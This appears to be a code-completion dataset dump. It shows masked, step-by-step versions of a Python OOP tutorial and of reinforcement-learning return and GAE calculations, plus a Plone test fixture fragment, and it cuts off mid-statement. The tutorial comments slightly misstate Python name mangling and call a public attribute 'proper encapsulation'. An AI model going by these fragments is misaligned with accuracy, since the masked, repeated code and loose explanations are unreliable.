)\n\nOIRA_SUITE_ROBOT = FunctionalTesting(\n bases=(OIRA_FIXTURE,\n AUTOLOGIN_LIBRARY_FIXTURE,\n z2.ZSERVER_FIXTURE),\n name=\"OIRA_SUITE_ROBOT\")\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class House2:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Vehicle(ABC):
def __init__(self, speed, year):
self.speed = speed
self.year = year
def start(self):
print('Starting engine')
def stop(self):
print('Stopping engine')
@abstractmethod
def drive(self):
pass
class Car(Vehicle):
def __init__(self, canClimbMountains, speed, year):
Vehicle.__init__(self, speed, year)
self.canClimbMountains = canClimbMountains
def drive(self):
print('Car is in drive mode')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class House:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class House2:
def setWall(self, dynamicWall):
self.wall = dynamicWall
def getWall(self):
print(self.wall)
class Vehicle(ABC):
def __init__(self, speed, year):
self.speed = speed
self.year = year
def start(self):
print('Starting engine')
def stop(self):
print('Stopping engine')
@abstractmethod
def drive(self):
pass
class Car(Vehicle):
def __init__(self, canClimbMountains, speed, year):
Vehicle.__init__(self, speed, year)
self.canClimbMountains = canClimbMountains
def drive(self):
print('Car is in drive mode')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class House:
def __init__(self, wallDynamic):
self.__wall = wallDynamic
<|reserved_special_token_0|>
class House2:
def setWall(self, dynamicWall):
self.wall = dynamicWall
def getWall(self):
print(self.wall)
class Vehicle(ABC):
def __init__(self, speed, year):
self.speed = speed
self.year = year
def start(self):
print('Starting engine')
def stop(self):
print('Stopping engine')
@abstractmethod
def drive(self):
pass
class Car(Vehicle):
def __init__(self, canClimbMountains, speed, year):
Vehicle.__init__(self, speed, year)
self.canClimbMountains = canClimbMountains
def drive(self):
print('Car is in drive mode')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class House:
def __init__(self, wallDynamic):
self.__wall = wallDynamic
<|reserved_special_token_0|>
print(house._House__wall)
class House2:
def setWall(self, dynamicWall):
self.wall = dynamicWall
def getWall(self):
print(self.wall)
class Vehicle(ABC):
def __init__(self, speed, year):
self.speed = speed
self.year = year
def start(self):
print('Starting engine')
def stop(self):
print('Stopping engine')
@abstractmethod
def drive(self):
pass
class Car(Vehicle):
def __init__(self, canClimbMountains, speed, year):
Vehicle.__init__(self, speed, year)
self.canClimbMountains = canClimbMountains
def drive(self):
print('Car is in drive mode')
<|reserved_special_token_1|>
# 4 Pillars of OOP:
# 1. Encapsulation: Encapsulation in Python is the process of wrapping up variables and methods into a single entity.In programming, a class is an example that wraps all the variables and methods defined inside it.
# 2. Abstraction: Abstraction in Python is the process of hiding the real implementation of an application from the user and emphasizing only on usage of it.
# 3. Inheritance: It is the process of creating a class that can derive or inherit the properties and methods from another class(parent/base).
# 4. Polymorphism: Polymorphism means the ability to take various forms.
# Encapsulation:
# Encapsulation is a process of protecting the data and functionality of a class in a single unit, called an object.
# This mechanism is often used to protect the data of an object from other objects.
# It’s one of the fundamental principles in any programming language that supports object-oriented programming.
# We can protect the variables in the class by marking them as private. We need to add two underscores as a prefix to make a variable private.
# Once we make a variable as private, we can’t access them directly from the objects of that class.
# Now, let’s see how to create private variables:
# eg:
from abc import abstractmethod, ABC
class House:
def __init__(self, wallDynamic):
self.__wall = wallDynamic
# In the above example, wall is a private variable.
# Once a variable is declared as private, the only way to access those variables is through name mangling.
# In the name mangling process, an identifier with two leading underscores and one trailing underscore is
# textually replaced with _classname__identifier , where class-name is the name of the current class and identifier is the private variable.
house = House(1)
# Using name mangling to access private variables
print(house._House__wall) # OutPut - 1
# To implement proper encapsulation in Python, we need to use setters and getters, as shown below:
class House2:
def setWall(self, dynamicWall):
self.wall = dynamicWall
def getWall(self):
print(self.wall)
# Abstraction:
# Abstraction in OOP is a process of hiding the real implementation of the method by only showing a method signature.
# In Python, we can achieve abstraction using ABC(abstraction class) or abstract method.
# ABC is a class from the abc module in Python.
# If we extend any class with ABC and include any abstraction methods,
# then the classes inherited from this class will have to mandatorily implement those abstract methods.
# When we annotate any method with an abstractmethod keyword, then it is an abstract method in Python(it won’t have any method implementation).
# If the parent class has abstractmethod and not inherited from an abstract class, then it is optional to implement the abstractmethod .
class Vehicle(ABC):
def __init__(self, speed, year):
self.speed = speed
self.year = year
def start(self):
print("Starting engine")
def stop(self):
print("Stopping engine")
@abstractmethod
def drive(self):
pass
class Car(Vehicle):
def __init__(self, canClimbMountains, speed, year):
Vehicle.__init__(self, speed, year)
self.canClimbMountains = canClimbMountains
def drive(self):
print("Car is in drive mode")
# Here, Vehicle is a parent inherited from ABC class. It has an abstraction method drive.
# Car is another class that is inherited from Vehicle, so it had to implement the drive method.
|
flexible
|
{
"blob_id": "0e4c82d6eb77d2b6357925c9aab516bcc3310a4c",
"index": 140,
"step-1": "<mask token>\n\n\nclass House2:\n <mask token>\n <mask token>\n\n\nclass Vehicle(ABC):\n\n def __init__(self, speed, year):\n self.speed = speed\n self.year = year\n\n def start(self):\n print('Starting engine')\n\n def stop(self):\n print('Stopping engine')\n\n @abstractmethod\n def drive(self):\n pass\n\n\nclass Car(Vehicle):\n\n def __init__(self, canClimbMountains, speed, year):\n Vehicle.__init__(self, speed, year)\n self.canClimbMountains = canClimbMountains\n\n def drive(self):\n print('Car is in drive mode')\n",
"step-2": "<mask token>\n\n\nclass House:\n <mask token>\n\n\n<mask token>\n\n\nclass House2:\n\n def setWall(self, dynamicWall):\n self.wall = dynamicWall\n\n def getWall(self):\n print(self.wall)\n\n\nclass Vehicle(ABC):\n\n def __init__(self, speed, year):\n self.speed = speed\n self.year = year\n\n def start(self):\n print('Starting engine')\n\n def stop(self):\n print('Stopping engine')\n\n @abstractmethod\n def drive(self):\n pass\n\n\nclass Car(Vehicle):\n\n def __init__(self, canClimbMountains, speed, year):\n Vehicle.__init__(self, speed, year)\n self.canClimbMountains = canClimbMountains\n\n def drive(self):\n print('Car is in drive mode')\n",
"step-3": "<mask token>\n\n\nclass House:\n\n def __init__(self, wallDynamic):\n self.__wall = wallDynamic\n\n\n<mask token>\n\n\nclass House2:\n\n def setWall(self, dynamicWall):\n self.wall = dynamicWall\n\n def getWall(self):\n print(self.wall)\n\n\nclass Vehicle(ABC):\n\n def __init__(self, speed, year):\n self.speed = speed\n self.year = year\n\n def start(self):\n print('Starting engine')\n\n def stop(self):\n print('Stopping engine')\n\n @abstractmethod\n def drive(self):\n pass\n\n\nclass Car(Vehicle):\n\n def __init__(self, canClimbMountains, speed, year):\n Vehicle.__init__(self, speed, year)\n self.canClimbMountains = canClimbMountains\n\n def drive(self):\n print('Car is in drive mode')\n",
"step-4": "<mask token>\n\n\nclass House:\n\n def __init__(self, wallDynamic):\n self.__wall = wallDynamic\n\n\n<mask token>\nprint(house._House__wall)\n\n\nclass House2:\n\n def setWall(self, dynamicWall):\n self.wall = dynamicWall\n\n def getWall(self):\n print(self.wall)\n\n\nclass Vehicle(ABC):\n\n def __init__(self, speed, year):\n self.speed = speed\n self.year = year\n\n def start(self):\n print('Starting engine')\n\n def stop(self):\n print('Stopping engine')\n\n @abstractmethod\n def drive(self):\n pass\n\n\nclass Car(Vehicle):\n\n def __init__(self, canClimbMountains, speed, year):\n Vehicle.__init__(self, speed, year)\n self.canClimbMountains = canClimbMountains\n\n def drive(self):\n print('Car is in drive mode')\n",
"step-5": "# 4 Pillars of OOP:\n# 1. Encapsulation: Encapsulation in Python is the process of wrapping up variables and methods into a single entity.In programming, a class is an example that wraps all the variables and methods defined inside it.\n# 2. Abstraction: Abstraction in Python is the process of hiding the real implementation of an application from the user and emphasizing only on usage of it.\n# 3. Inheritance: It is the process of creating a class that can derive or inherit the properties and methods from another class(parent/base).\n# 4. Polymorphism: Polymorphism means the ability to take various forms.\n\n# Encapsulation:\n\n# Encapsulation is a process of protecting the data and functionality of a class in a single unit, called an object.\n# This mechanism is often used to protect the data of an object from other objects.\n# It’s one of the fundamental principles in any programming language that supports object-oriented programming.\n# We can protect the variables in the class by marking them as private. We need to add two underscores as a prefix to make a variable private.\n# Once we make a variable as private, we can’t access them directly from the objects of that class.\n# Now, let’s see how to create private variables:\n\n# eg:\nfrom abc import abstractmethod, ABC\n\n\nclass House:\n\n def __init__(self, wallDynamic):\n self.__wall = wallDynamic\n\n# In the above example, wall is a private variable.\n# Once a variable is declared as private, the only way to access those variables is through name mangling.\n# In the name mangling process, an identifier with two leading underscores and one trailing underscore is\n# textually replaced with _classname__identifier , where class-name is the name of the current class and identifier is the private variable.\n\n\nhouse = House(1)\n\n# Using name mangling to access private variables\nprint(house._House__wall) # OutPut - 1\n\n# To implement proper encapsulation in Python, we need to use setters and getters, as shown below:\n\n\nclass House2:\n\n def setWall(self, dynamicWall):\n self.wall = dynamicWall\n\n def getWall(self):\n print(self.wall)\n\n\n# Abstraction:\n\n# Abstraction in OOP is a process of hiding the real implementation of the method by only showing a method signature.\n# In Python, we can achieve abstraction using ABC(abstraction class) or abstract method.\n# ABC is a class from the abc module in Python.\n# If we extend any class with ABC and include any abstraction methods,\n# then the classes inherited from this class will have to mandatorily implement those abstract methods.\n# When we annotate any method with an abstractmethod keyword, then it is an abstract method in Python(it won’t have any method implementation).\n# If the parent class has abstractmethod and not inherited from an abstract class, then it is optional to implement the abstractmethod .\n\n\nclass Vehicle(ABC):\n def __init__(self, speed, year):\n self.speed = speed\n self.year = year\n\n def start(self):\n print(\"Starting engine\")\n\n def stop(self):\n print(\"Stopping engine\")\n\n @abstractmethod\n def drive(self):\n pass\n\n\nclass Car(Vehicle):\n def __init__(self, canClimbMountains, speed, year):\n Vehicle.__init__(self, speed, year)\n self.canClimbMountains = canClimbMountains\n\n def drive(self):\n print(\"Car is in drive mode\")\n\n\n# Here, Vehicle is a parent inherited from ABC class. It has an abstraction method drive.\n# Car is another class that is inherited from Vehicle, so it had to implement the drive method.\n",
"step-ids": [
9,
12,
13,
14,
17
]
}
|
[
9,
12,
13,
14,
17
] |
<|reserved_special_token_0|>
def calc_returns(batch, gamma):
"""
Calculate the simple returns (full rollout) for advantage
i.e. sum discounted rewards up till termination
"""
rewards = batch['rewards']
assert not np.any(np.isnan(rewards))
not_dones = 1 - batch['dones']
T = len(rewards)
rets = np.empty(T, 'float32')
future_ret = 0.0
for t in reversed(range(T)):
future_ret = rewards[t] + gamma * future_ret * not_dones[t]
rets[t] = future_ret
rets = torch.from_numpy(rets).float()
return rets
<|reserved_special_token_0|>
def calc_nstep_returns(batch, gamma, n, v_preds):
"""
Calculate the n-step returns for advantage
see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf
i.e. for each timestep t:
sum discounted rewards up till step n (0 to n-1 that is),
then add v_pred for n as final term
"""
rets = calc_returns(batch, gamma)
rets_len = len(rets)
tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]
gammas = calc_gammas(batch, gamma)
final_terms = gammas * v_preds
final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]
nstep_rets = rets - tail_rets + final_terms
assert not np.isnan(nstep_rets).any(
), f'N-step returns has nan: {nstep_rets}'
return nstep_rets
def calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):
"""
Calculate GAE
See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.
v_preds are values predicted for current states
next_v_preds are values predicted for next states
NOTE for standardization trick, do it out of here
"""
T = len(rewards)
assert not np.any(np.isnan(rewards))
assert T == len(v_preds)
gaes = np.empty(T, 'float32')
future_gae = 0.0
for t in reversed(range(T)):
delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]
gaes[t] = future_gae = delta + gamma * lam * future_gae
assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'
gaes = torch.from_numpy(gaes).float()
return gaes
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def calc_returns(batch, gamma):
"""
Calculate the simple returns (full rollout) for advantage
i.e. sum discounted rewards up till termination
"""
rewards = batch['rewards']
assert not np.any(np.isnan(rewards))
not_dones = 1 - batch['dones']
T = len(rewards)
rets = np.empty(T, 'float32')
future_ret = 0.0
for t in reversed(range(T)):
future_ret = rewards[t] + gamma * future_ret * not_dones[t]
rets[t] = future_ret
rets = torch.from_numpy(rets).float()
return rets
def calc_gammas(batch, gamma):
"""Calculate the gammas to the right power for multiplication with rewards"""
news = torch.cat([torch.ones((1,)), batch['dones'][:-1]])
gammas = torch.empty_like(news)
cur_gamma = 1.0
for t, new in enumerate(news):
cur_gamma = new * 1.0 + (1 - new) * cur_gamma * gamma
gammas[t] = cur_gamma
return gammas
def calc_nstep_returns(batch, gamma, n, v_preds):
"""
Calculate the n-step returns for advantage
see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf
i.e. for each timestep t:
sum discounted rewards up till step n (0 to n-1 that is),
then add v_pred for n as final term
"""
rets = calc_returns(batch, gamma)
rets_len = len(rets)
tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]
gammas = calc_gammas(batch, gamma)
final_terms = gammas * v_preds
final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]
nstep_rets = rets - tail_rets + final_terms
assert not np.isnan(nstep_rets).any(
), f'N-step returns has nan: {nstep_rets}'
return nstep_rets
def calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):
"""
Calculate GAE
See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.
v_preds are values predicted for current states
next_v_preds are values predicted for next states
NOTE for standardization trick, do it out of here
"""
T = len(rewards)
assert not np.any(np.isnan(rewards))
assert T == len(v_preds)
gaes = np.empty(T, 'float32')
future_gae = 0.0
for t in reversed(range(T)):
delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]
gaes[t] = future_gae = delta + gamma * lam * future_gae
assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'
gaes = torch.from_numpy(gaes).float()
return gaes
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logger = logger.get_logger(__name__)
def calc_returns(batch, gamma):
"""
Calculate the simple returns (full rollout) for advantage
i.e. sum discounted rewards up till termination
"""
rewards = batch['rewards']
assert not np.any(np.isnan(rewards))
not_dones = 1 - batch['dones']
T = len(rewards)
rets = np.empty(T, 'float32')
future_ret = 0.0
for t in reversed(range(T)):
future_ret = rewards[t] + gamma * future_ret * not_dones[t]
rets[t] = future_ret
rets = torch.from_numpy(rets).float()
return rets
def calc_gammas(batch, gamma):
"""Calculate the gammas to the right power for multiplication with rewards"""
news = torch.cat([torch.ones((1,)), batch['dones'][:-1]])
gammas = torch.empty_like(news)
cur_gamma = 1.0
for t, new in enumerate(news):
cur_gamma = new * 1.0 + (1 - new) * cur_gamma * gamma
gammas[t] = cur_gamma
return gammas
def calc_nstep_returns(batch, gamma, n, v_preds):
"""
Calculate the n-step returns for advantage
see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf
i.e. for each timestep t:
sum discounted rewards up till step n (0 to n-1 that is),
then add v_pred for n as final term
"""
rets = calc_returns(batch, gamma)
rets_len = len(rets)
tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]
gammas = calc_gammas(batch, gamma)
final_terms = gammas * v_preds
final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]
nstep_rets = rets - tail_rets + final_terms
assert not np.isnan(nstep_rets).any(
), f'N-step returns has nan: {nstep_rets}'
return nstep_rets
def calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):
"""
Calculate GAE
See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.
v_preds are values predicted for current states
next_v_preds are values predicted for next states
NOTE for standardization trick, do it out of here
"""
T = len(rewards)
assert not np.any(np.isnan(rewards))
assert T == len(v_preds)
gaes = np.empty(T, 'float32')
future_gae = 0.0
for t in reversed(range(T)):
delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]
gaes[t] = future_gae = delta + gamma * lam * future_gae
assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'
gaes = torch.from_numpy(gaes).float()
return gaes
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from slm_lab.lib import logger, util
import numpy as np
import torch
import pydash as ps
logger = logger.get_logger(__name__)
def calc_returns(batch, gamma):
"""
Calculate the simple returns (full rollout) for advantage
i.e. sum discounted rewards up till termination
"""
rewards = batch['rewards']
assert not np.any(np.isnan(rewards))
not_dones = 1 - batch['dones']
T = len(rewards)
rets = np.empty(T, 'float32')
future_ret = 0.0
for t in reversed(range(T)):
future_ret = rewards[t] + gamma * future_ret * not_dones[t]
rets[t] = future_ret
rets = torch.from_numpy(rets).float()
return rets
def calc_gammas(batch, gamma):
"""Calculate the gammas to the right power for multiplication with rewards"""
news = torch.cat([torch.ones((1,)), batch['dones'][:-1]])
gammas = torch.empty_like(news)
cur_gamma = 1.0
for t, new in enumerate(news):
cur_gamma = new * 1.0 + (1 - new) * cur_gamma * gamma
gammas[t] = cur_gamma
return gammas
def calc_nstep_returns(batch, gamma, n, v_preds):
"""
Calculate the n-step returns for advantage
see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf
i.e. for each timestep t:
sum discounted rewards up till step n (0 to n-1 that is),
then add v_pred for n as final term
"""
rets = calc_returns(batch, gamma)
rets_len = len(rets)
tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]
gammas = calc_gammas(batch, gamma)
final_terms = gammas * v_preds
final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]
nstep_rets = rets - tail_rets + final_terms
assert not np.isnan(nstep_rets).any(
), f'N-step returns has nan: {nstep_rets}'
return nstep_rets
def calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):
"""
Calculate GAE
See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.
v_preds are values predicted for current states
next_v_preds are values predicted for next states
NOTE for standardization trick, do it out of here
"""
T = len(rewards)
assert not np.any(np.isnan(rewards))
assert T == len(v_preds)
gaes = np.empty(T, 'float32')
future_gae = 0.0
for t in reversed(range(T)):
delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]
gaes[t] = future_gae = delta + gamma * lam * future_gae
assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'
gaes = torch.from_numpy(gaes).float()
return gaes
<|reserved_special_token_1|>
'''
Calculations used by algorithms
All calculations for training shall have a standard API that takes in `batch` from algorithm.sample() method and return np array for calculation.
`batch` is a dict containing keys to any data type you wish, e.g. {rewards: np.array([...])}
'''
from slm_lab.lib import logger, util
import numpy as np
import torch
import pydash as ps
logger = logger.get_logger(__name__)
# Policy Gradient calc
# advantage functions
def calc_returns(batch, gamma):
'''
Calculate the simple returns (full rollout) for advantage
i.e. sum discounted rewards up till termination
'''
rewards = batch['rewards']
assert not np.any(np.isnan(rewards))
# handle epi-end, to not sum past current episode
not_dones = 1 - batch['dones']
T = len(rewards)
rets = np.empty(T, 'float32')
future_ret = 0.0
for t in reversed(range(T)):
future_ret = rewards[t] + gamma * future_ret * not_dones[t]
rets[t] = future_ret
rets = torch.from_numpy(rets).float()
return rets
def calc_gammas(batch, gamma):
'''Calculate the gammas to the right power for multiplication with rewards'''
news = torch.cat([torch.ones((1,)), batch['dones'][:-1]])
gammas = torch.empty_like(news)
cur_gamma = 1.0
for t, new in enumerate(news):
cur_gamma = new * 1.0 + (1 - new) * cur_gamma * gamma
gammas[t] = cur_gamma
return gammas
def calc_nstep_returns(batch, gamma, n, v_preds):
'''
Calculate the n-step returns for advantage
see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf
i.e. for each timestep t:
sum discounted rewards up till step n (0 to n-1 that is),
then add v_pred for n as final term
'''
rets = calc_returns(batch, gamma)
rets_len = len(rets)
# to subtract by offsetting n-steps
tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]
# to add back the subtracted with v_pred at n
gammas = calc_gammas(batch, gamma)
final_terms = gammas * v_preds
final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]
nstep_rets = rets - tail_rets + final_terms
assert not np.isnan(nstep_rets).any(), f'N-step returns has nan: {nstep_rets}'
return nstep_rets
def calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):
'''
Calculate GAE
See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.
v_preds are values predicted for current states
next_v_preds are values predicted for next states
NOTE for standardization trick, do it out of here
'''
T = len(rewards)
assert not np.any(np.isnan(rewards))
assert T == len(v_preds)
gaes = np.empty(T, 'float32')
future_gae = 0.0
for t in reversed(range(T)):
delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]
gaes[t] = future_gae = delta + gamma * lam * future_gae
assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'
gaes = torch.from_numpy(gaes).float()
return gaes
|
flexible
|
{
"blob_id": "07095bc815f5342b66ef4ca74b769321f3ef2ec5",
"index": 7240,
"step-1": "<mask token>\n\n\ndef calc_returns(batch, gamma):\n \"\"\"\n Calculate the simple returns (full rollout) for advantage\n i.e. sum discounted rewards up till termination\n \"\"\"\n rewards = batch['rewards']\n assert not np.any(np.isnan(rewards))\n not_dones = 1 - batch['dones']\n T = len(rewards)\n rets = np.empty(T, 'float32')\n future_ret = 0.0\n for t in reversed(range(T)):\n future_ret = rewards[t] + gamma * future_ret * not_dones[t]\n rets[t] = future_ret\n rets = torch.from_numpy(rets).float()\n return rets\n\n\n<mask token>\n\n\ndef calc_nstep_returns(batch, gamma, n, v_preds):\n \"\"\"\n Calculate the n-step returns for advantage\n see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf\n i.e. for each timestep t:\n sum discounted rewards up till step n (0 to n-1 that is),\n then add v_pred for n as final term\n \"\"\"\n rets = calc_returns(batch, gamma)\n rets_len = len(rets)\n tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]\n gammas = calc_gammas(batch, gamma)\n final_terms = gammas * v_preds\n final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]\n nstep_rets = rets - tail_rets + final_terms\n assert not np.isnan(nstep_rets).any(\n ), f'N-step returns has nan: {nstep_rets}'\n return nstep_rets\n\n\ndef calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):\n \"\"\"\n Calculate GAE\n See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.\n v_preds are values predicted for current states\n next_v_preds are values predicted for next states\n NOTE for standardization trick, do it out of here\n \"\"\"\n T = len(rewards)\n assert not np.any(np.isnan(rewards))\n assert T == len(v_preds)\n gaes = np.empty(T, 'float32')\n future_gae = 0.0\n for t in reversed(range(T)):\n delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]\n gaes[t] = future_gae = delta + gamma * lam * future_gae\n assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'\n gaes = torch.from_numpy(gaes).float()\n return gaes\n",
"step-2": "<mask token>\n\n\ndef calc_returns(batch, gamma):\n \"\"\"\n Calculate the simple returns (full rollout) for advantage\n i.e. sum discounted rewards up till termination\n \"\"\"\n rewards = batch['rewards']\n assert not np.any(np.isnan(rewards))\n not_dones = 1 - batch['dones']\n T = len(rewards)\n rets = np.empty(T, 'float32')\n future_ret = 0.0\n for t in reversed(range(T)):\n future_ret = rewards[t] + gamma * future_ret * not_dones[t]\n rets[t] = future_ret\n rets = torch.from_numpy(rets).float()\n return rets\n\n\ndef calc_gammas(batch, gamma):\n \"\"\"Calculate the gammas to the right power for multiplication with rewards\"\"\"\n news = torch.cat([torch.ones((1,)), batch['dones'][:-1]])\n gammas = torch.empty_like(news)\n cur_gamma = 1.0\n for t, new in enumerate(news):\n cur_gamma = new * 1.0 + (1 - new) * cur_gamma * gamma\n gammas[t] = cur_gamma\n return gammas\n\n\ndef calc_nstep_returns(batch, gamma, n, v_preds):\n \"\"\"\n Calculate the n-step returns for advantage\n see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf\n i.e. for each timestep t:\n sum discounted rewards up till step n (0 to n-1 that is),\n then add v_pred for n as final term\n \"\"\"\n rets = calc_returns(batch, gamma)\n rets_len = len(rets)\n tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]\n gammas = calc_gammas(batch, gamma)\n final_terms = gammas * v_preds\n final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]\n nstep_rets = rets - tail_rets + final_terms\n assert not np.isnan(nstep_rets).any(\n ), f'N-step returns has nan: {nstep_rets}'\n return nstep_rets\n\n\ndef calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):\n \"\"\"\n Calculate GAE\n See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.\n v_preds are values predicted for current states\n next_v_preds are values predicted for next states\n NOTE for standardization trick, do it out of here\n \"\"\"\n T = len(rewards)\n assert not np.any(np.isnan(rewards))\n assert T == len(v_preds)\n gaes = np.empty(T, 'float32')\n future_gae = 0.0\n for t in reversed(range(T)):\n delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]\n gaes[t] = future_gae = delta + gamma * lam * future_gae\n assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'\n gaes = torch.from_numpy(gaes).float()\n return gaes\n",
"step-3": "<mask token>\nlogger = logger.get_logger(__name__)\n\n\ndef calc_returns(batch, gamma):\n \"\"\"\n Calculate the simple returns (full rollout) for advantage\n i.e. sum discounted rewards up till termination\n \"\"\"\n rewards = batch['rewards']\n assert not np.any(np.isnan(rewards))\n not_dones = 1 - batch['dones']\n T = len(rewards)\n rets = np.empty(T, 'float32')\n future_ret = 0.0\n for t in reversed(range(T)):\n future_ret = rewards[t] + gamma * future_ret * not_dones[t]\n rets[t] = future_ret\n rets = torch.from_numpy(rets).float()\n return rets\n\n\ndef calc_gammas(batch, gamma):\n \"\"\"Calculate the gammas to the right power for multiplication with rewards\"\"\"\n news = torch.cat([torch.ones((1,)), batch['dones'][:-1]])\n gammas = torch.empty_like(news)\n cur_gamma = 1.0\n for t, new in enumerate(news):\n cur_gamma = new * 1.0 + (1 - new) * cur_gamma * gamma\n gammas[t] = cur_gamma\n return gammas\n\n\ndef calc_nstep_returns(batch, gamma, n, v_preds):\n \"\"\"\n Calculate the n-step returns for advantage\n see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf\n i.e. for each timestep t:\n sum discounted rewards up till step n (0 to n-1 that is),\n then add v_pred for n as final term\n \"\"\"\n rets = calc_returns(batch, gamma)\n rets_len = len(rets)\n tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]\n gammas = calc_gammas(batch, gamma)\n final_terms = gammas * v_preds\n final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]\n nstep_rets = rets - tail_rets + final_terms\n assert not np.isnan(nstep_rets).any(\n ), f'N-step returns has nan: {nstep_rets}'\n return nstep_rets\n\n\ndef calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):\n \"\"\"\n Calculate GAE\n See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.\n v_preds are values predicted for current states\n next_v_preds are values predicted for next states\n NOTE for standardization trick, do it out of here\n \"\"\"\n T = len(rewards)\n assert not np.any(np.isnan(rewards))\n assert T == len(v_preds)\n gaes = np.empty(T, 'float32')\n future_gae = 0.0\n for t in reversed(range(T)):\n delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]\n gaes[t] = future_gae = delta + gamma * lam * future_gae\n assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'\n gaes = torch.from_numpy(gaes).float()\n return gaes\n",
"step-4": "<mask token>\nfrom slm_lab.lib import logger, util\nimport numpy as np\nimport torch\nimport pydash as ps\nlogger = logger.get_logger(__name__)\n\n\ndef calc_returns(batch, gamma):\n \"\"\"\n Calculate the simple returns (full rollout) for advantage\n i.e. sum discounted rewards up till termination\n \"\"\"\n rewards = batch['rewards']\n assert not np.any(np.isnan(rewards))\n not_dones = 1 - batch['dones']\n T = len(rewards)\n rets = np.empty(T, 'float32')\n future_ret = 0.0\n for t in reversed(range(T)):\n future_ret = rewards[t] + gamma * future_ret * not_dones[t]\n rets[t] = future_ret\n rets = torch.from_numpy(rets).float()\n return rets\n\n\ndef calc_gammas(batch, gamma):\n \"\"\"Calculate the gammas to the right power for multiplication with rewards\"\"\"\n news = torch.cat([torch.ones((1,)), batch['dones'][:-1]])\n gammas = torch.empty_like(news)\n cur_gamma = 1.0\n for t, new in enumerate(news):\n cur_gamma = new * 1.0 + (1 - new) * cur_gamma * gamma\n gammas[t] = cur_gamma\n return gammas\n\n\ndef calc_nstep_returns(batch, gamma, n, v_preds):\n \"\"\"\n Calculate the n-step returns for advantage\n see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf\n i.e. for each timestep t:\n sum discounted rewards up till step n (0 to n-1 that is),\n then add v_pred for n as final term\n \"\"\"\n rets = calc_returns(batch, gamma)\n rets_len = len(rets)\n tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]\n gammas = calc_gammas(batch, gamma)\n final_terms = gammas * v_preds\n final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]\n nstep_rets = rets - tail_rets + final_terms\n assert not np.isnan(nstep_rets).any(\n ), f'N-step returns has nan: {nstep_rets}'\n return nstep_rets\n\n\ndef calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):\n \"\"\"\n Calculate GAE\n See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.\n v_preds are values predicted for current states\n next_v_preds are values predicted for next states\n NOTE for standardization trick, do it out of here\n \"\"\"\n T = len(rewards)\n assert not np.any(np.isnan(rewards))\n assert T == 